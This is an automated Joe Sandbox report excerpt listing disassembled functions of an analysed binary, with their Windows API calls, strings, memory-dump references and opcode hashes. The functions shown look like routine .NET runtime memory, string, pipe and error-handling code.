Part of subcall function 009741F0: wcscat_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000040,00D13F5C), ref: 009743A1

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(BBFE6088,?,00000000,00004000), ref: 0097480E
wcstoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,?), ref: 00974822
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0097482E
HeapFree.KERNEL32(00000000,00000000), ref: 00974852
HeapFree.KERNEL32(00000000,00000000,BBFE6088,?,00000000,00004000), ref: 0097488F

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap_errnowcscat_s$wcscpy_swcstoul
String ID:
API String ID: 2826331799-0
Opcode ID: 8c2b65f6b5c7a44c354e54dd89a1ecf5d28f86bf6e1b381bbf22d2f1da55d23e
Instruction ID: e4e8a2f1864b760a2cd9e3f92955d3131005551f6eec870ccb6c32e25dfc13ac
Opcode Fuzzy Hash: 8c2b65f6b5c7a44c354e54dd89a1ecf5d28f86bf6e1b381bbf22d2f1da55d23e
Instruction Fuzzy Hash: E2319A72E00258DBCB21CF99D844B9EBBB8EB89710F10426AE818A73A0D7765900CB91

Function 0082E3A0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON

Download Yara Rule

APIs

Part of subcall function 0097D690: HeapFree.KERNEL32(00000000,?,?,?), ref: 0097D7A8

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000004,00000000), ref: 0082E3E4
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 0082E3F1
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000114,000000FF,00000000,00000000,00000000,00000000), ref: 0082E412
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 0082E41D

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: ByteCharMultiWide$FreeHeapfreemalloc
String ID:
API String ID: 354066558-0
Opcode ID: be8e551f447877d60fd48e98d59ddad4d669cd576ffa90fbe248292898741792
Instruction ID: ab99cdac0d90ce51a8d1776f7d270a4f146298b0c997336212412d88a5da6438
Opcode Fuzzy Hash: be8e551f447877d60fd48e98d59ddad4d669cd576ffa90fbe248292898741792
Instruction Fuzzy Hash: 2B21D57274121027D730AA6A6C06F6FFB98EB94761F24423AFE04E73D0DDB5ED1041A9

Function 00982940 Relevance: 7.6, APIs: 5, Instructions: 71threadCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,BBFE6088,00000000), ref: 009829A0
GetCurrentThread.KERNEL32 ref: 009829C3
OpenThreadToken.ADVAPI32(00000000), ref: 009829CA
RevertToSelf.ADVAPI32 ref: 009829F6
CloseHandle.KERNEL32(00000000), ref: 00982A09

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CloseHandleThread$CurrentOpenRevertSelfToken
String ID:
API String ID: 2673177525-0
Opcode ID: 4d6767e0c77de3351b12cb269ac263cecf688c88ca5502186bd58edb13a64678
Instruction ID: 930ba71ba2174b96bb9edad497d7523b69aac089324700751b61e256b953400f
Opcode Fuzzy Hash: 4d6767e0c77de3351b12cb269ac263cecf688c88ca5502186bd58edb13a64678
Instruction Fuzzy Hash: C3315CB0901745DBE720DF68C90879ABBF8FF05724F108A1DE4A6973C0C7BA9644CB90

Function 00A276E0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,Microsoft-DotNETCore-SampleProfiler,000000FF,00000000,00000000,00000000,Microsoft-DotNETCore-SampleProfiler,00DB06B0,00A2E83A), ref: 00A276F7
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A27B96,00000000), ref: 00A27707
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,Microsoft-DotNETCore-SampleProfiler,000000FF,00000000,00000000), ref: 00A27722
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A27B96), ref: 00A2772D

Strings

Microsoft-DotNETCore-SampleProfiler, xrefs: 00A276E1, 00A276EF, 00A2771A

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: ByteCharMultiWide$freemalloc
String ID: Microsoft-DotNETCore-SampleProfiler
API String ID: 2605342592-2073707973
Opcode ID: b1ecb0e4f0a9d4a1257a5e4f961a698b803064ddeff7e240b7b748ffb525e3cd
Instruction ID: 9b5a16b157c20ade5b8e45d39e3aa5b9cc6273675e32570bfbfb9284e4dbbca9
Opcode Fuzzy Hash: b1ecb0e4f0a9d4a1257a5e4f961a698b803064ddeff7e240b7b748ffb525e3cd
Instruction Fuzzy Hash: D1F0F63130922133E3301BAE7C9AF6F6AA8DF91B71F180239F915E92D0DE90890481A5

Function 009ABDA0 Relevance: 7.5, APIs: 5, Instructions: 37pipeCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,00A33345,?,00000000,?,00000000), ref: 009ABDB7
DisconnectNamedPipe.KERNEL32(?,?,00A33345,?,00000000,?,00000000), ref: 009ABDE1
CloseHandle.KERNEL32(?,?,00A33345,?,00000000,?,00000000), ref: 009ABDED
CloseHandle.KERNEL32(?,?,00A33345,?,00000000,?,00000000), ref: 009ABE09
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,00A33345,?,00000000,?,00000000), ref: 009ABE42

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CloseHandle$DisconnectNamedPipefree
String ID:
API String ID: 94250983-0
Opcode ID: b81b4076e47bc216407d6d7689ba94ce59b8bac2f6683de4b653c60ba92cc945
Instruction ID: bd40b66f3131e4f6c222e0d3ecd56dd5cc3479c63e6efa270230c5f2397c63a6
Opcode Fuzzy Hash: b81b4076e47bc216407d6d7689ba94ce59b8bac2f6683de4b653c60ba92cc945
Instruction Fuzzy Hash: 6F0121B0400B018BC6355F38D84D7CBBBA8AF07334F144B08E1BA862E1C7B5A9858BC1

Function 009AC720 Relevance: 7.5, APIs: 5, Instructions: 32pipeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,00000000,00A31C4D,00000014,?), ref: 009AC730
DisconnectNamedPipe.KERNEL32(?), ref: 009AC73F
CloseHandle.KERNEL32(?), ref: 009AC748
CloseHandle.KERNEL32(?,00000000,00A31C4D,00000014,?), ref: 009AC75E
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00A31C4D,00000014,?), ref: 009AC78C

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CloseHandle$BuffersDisconnectFileFlushNamedPipefree
String ID:
API String ID: 4191446590-0
Opcode ID: d1bac369530d5bbe93d54cb451bcde06abe5367b0486790bed649e8d7cb24d80
Instruction ID: 0b617704b3507e497e29872dd1044c70e12bb63285a79794c7efc9e711170a5b
Opcode Fuzzy Hash: d1bac369530d5bbe93d54cb451bcde06abe5367b0486790bed649e8d7cb24d80
Instruction Fuzzy Hash: 1B01F6B0400B508BC7304F29D85C70ABBF9AF06335F144B08E4B69AAE1D7B5E9498FD0

Function 0073C150 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 373stringmemoryCOMMON

Download Yara Rule

APIs

strncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00000003,00000000,?,?), ref: 0073C360
HeapFree.KERNEL32(00000000,?,?,00000001,00000000), ref: 0073C54C

Part of subcall function 0071F1C0: HeapFree.KERNEL32(00000000,?,80131623,?,?,00000002), ref: 0071F1FD

strncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00000003,00000000,?,?,?,00000001,00000000), ref: 0073C47B

Strings

System.Runtime.InteropServices.ComEventInterfaceAttribute, xrefs: 0073C1EE

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeapstrncpy_s
String ID: System.Runtime.InteropServices.ComEventInterfaceAttribute
API String ID: 2423220792-1483880416
Opcode ID: e7a22e33bf363bda5b78dfbf255112bfce62e0c92dc951efdaaff19fbb4f7628
Instruction ID: c4ccdcdb70c659056211f7fc50f92e3c1699c7d00c9fd7b3b67efbb7352c9cc1
Opcode Fuzzy Hash: e7a22e33bf363bda5b78dfbf255112bfce62e0c92dc951efdaaff19fbb4f7628
Instruction Fuzzy Hash: 5EE17171901218DFDB25DF64DC99BAEB7B4EF45310F1042D9E409AB291DB78AE84CF90

Function 009867E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,00000000), ref: 00986862
GetLastError.KERNEL32 ref: 00986890
SetLastError.KERNEL32(00000000,00000000), ref: 0098699A

Strings

COMPlus_, xrefs: 009867F4

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: ErrorLast$EnvironmentVariable
String ID: COMPlus_
API String ID: 2691138088-665472478
Opcode ID: 1f79e15483da7cdd217ebeab184692ae06bdfea201df4369f9a118359fef8b65
Instruction ID: 25ff83de21f9c140385d111bb89f4f901586499a0be832deb2b2f4487df9b3b1
Opcode Fuzzy Hash: 1f79e15483da7cdd217ebeab184692ae06bdfea201df4369f9a118359fef8b65
Instruction Fuzzy Hash: FD2160B1D00218AFDB11DF98D889BAFBBF9EB49314F10466AE815E7380D7795A048B91

Function 00763290 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

UnhandledExceptionFilter.KERNEL32(?,00000000,?,?,00765A82,BBFE6088,?,?,?,?,?), ref: 0076329B
GetCurrentProcess.KERNEL32(80000003,00000000,80000003,00DA3158,?,?,?,?), ref: 00763312
TerminateProcess.KERNEL32(00000000), ref: 00763319

Strings

StatusBreakpoint, xrefs: 007632FC

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Process$CurrentExceptionFilterTerminateUnhandled
String ID: StatusBreakpoint
API String ID: 3985764695-3554155703
Opcode ID: 4a1b7557a14df2ea86ea43e54c632b0b1056b7deb2c483b2c5eba64bb2357c56
Instruction ID: e3f8127d4f248596a3bd3997a7e78d96c41f9f5a3bd2074d434d3e6a7cf661d9
Opcode Fuzzy Hash: 4a1b7557a14df2ea86ea43e54c632b0b1056b7deb2c483b2c5eba64bb2357c56
Instruction Fuzzy Hash: BA01C031A082509FDB209B6A9C2AB763399AB02711F040359FC57C72D4DF28DF45C6B4

Function 00762370 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 009869D0: LoadLibraryExW.KERNEL32(?,00000000,?,?,?,00000000,?), ref: 00986B21
Part of subcall function 009869D0: GetLastError.KERNEL32 ref: 00986B2F
Part of subcall function 009869D0: SetLastError.KERNEL32(00000000), ref: 00986C64

GetProcAddress.KERNEL32(00000000,ReportFault), ref: 00762397
FreeLibrary.KERNEL32(00000000,?,007624E4,?,00829515,?,00000000,80131506,00DA3158), ref: 007623B5

Strings

FaultRep.dll, xrefs: 0076237B
ReportFault, xrefs: 00762391

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: ErrorLastLibrary$AddressFreeLoadProc
String ID: FaultRep.dll$ReportFault
API String ID: 1529210728-3658453154
Opcode ID: 3f88a8864b5ce35e3dcc1a6705e8de338d23e3f8e2af6c35fefa2c67a9453947
Instruction ID: 61509385201d5d68ec5d7dbc224e7888c81e3aa8401c9d46368eeca09d3c48b8
Opcode Fuzzy Hash: 3f88a8864b5ce35e3dcc1a6705e8de338d23e3f8e2af6c35fefa2c67a9453947
Instruction Fuzzy Hash: 7E012636B003146BD7205B9BEC9472DB799DB84322F04007AEE0AD7342CBB48D0642A0

Function 007EB550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43filestringCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F4,00000000,?), ref: 007EB55C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(Fatal error. ), ref: 007EB566
WriteFile.KERNEL32(00000000,Fatal error. ,00007FFF,?,00000000,00000000), ref: 007EB595

Strings

Fatal error. , xrefs: 007EB562, 007EB593

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FileHandleWritestrlen
String ID: Fatal error.
API String ID: 1058883207-2319153378
Opcode ID: 4f1e1312283a94b1e5fafec10c085c2bd770d5325084a367462dddd25614636d
Instruction ID: 4e51c62eacd78e8fcb9facf32472d7b90e9a1d1784cf71e2af40c891a5e4ca9d
Opcode Fuzzy Hash: 4f1e1312283a94b1e5fafec10c085c2bd770d5325084a367462dddd25614636d
Instruction Fuzzy Hash: 69F09C71A01294ABDB3086BFDC48A5F7FAC9B44771F140264F818D32C0D774DE14C6A0

Function 00A16970 Relevance: 6.5, APIs: 5, Instructions: 293memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00A16B25
HeapFree.KERNEL32(00000000,?), ref: 00A16BB5
HeapFree.KERNEL32(00000000,?), ref: 00A16BF3
HeapFree.KERNEL32(00000000,?), ref: 00A16C9A
HeapFree.KERNEL32(00000000,?), ref: 00A16CB6

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 1126f7026b36a32d9c5c3d476e0967b8e77748fc3addcb7f1981eb3898e58b25
Instruction ID: e7296b3fcb5b90ddef78da6105834ad47dabeb4481eb3fb42fba3963ba5ce3d3
Opcode Fuzzy Hash: 1126f7026b36a32d9c5c3d476e0967b8e77748fc3addcb7f1981eb3898e58b25
Instruction Fuzzy Hash: 15B14D71E00218DFDF20DFA4D985BDEBBB8EF48344F144129E905E7292E775A985CBA0

Function 00A20820 Relevance: 6.5, APIs: 5, Instructions: 288memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00A209CA
HeapFree.KERNEL32(00000000,?), ref: 00A20A5A
HeapFree.KERNEL32(00000000,?), ref: 00A20A98
HeapFree.KERNEL32(00000000,?), ref: 00A20B3B
HeapFree.KERNEL32(00000000,?), ref: 00A20B57

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: ae421565e6847543459da4cca441d09bbf233390aedc8e8ca57ab96d315a6973
Instruction ID: 8fc64d4773073a40fd05b9c63008a99071aaaa4e6d212a7738be7f3a19717b79
Opcode Fuzzy Hash: ae421565e6847543459da4cca441d09bbf233390aedc8e8ca57ab96d315a6973
Instruction Fuzzy Hash: 2CB15E71E002189FDB20DFA8E885FDEBBB8EF44344F54412AE905F7282D775A945CBA1

Function 00A20B80 Relevance: 6.5, APIs: 5, Instructions: 288memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00A20D2A
HeapFree.KERNEL32(00000000,?), ref: 00A20DBA
HeapFree.KERNEL32(00000000,?), ref: 00A20DF8
HeapFree.KERNEL32(00000000,?), ref: 00A20E9B
HeapFree.KERNEL32(00000000,?), ref: 00A20EB7

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

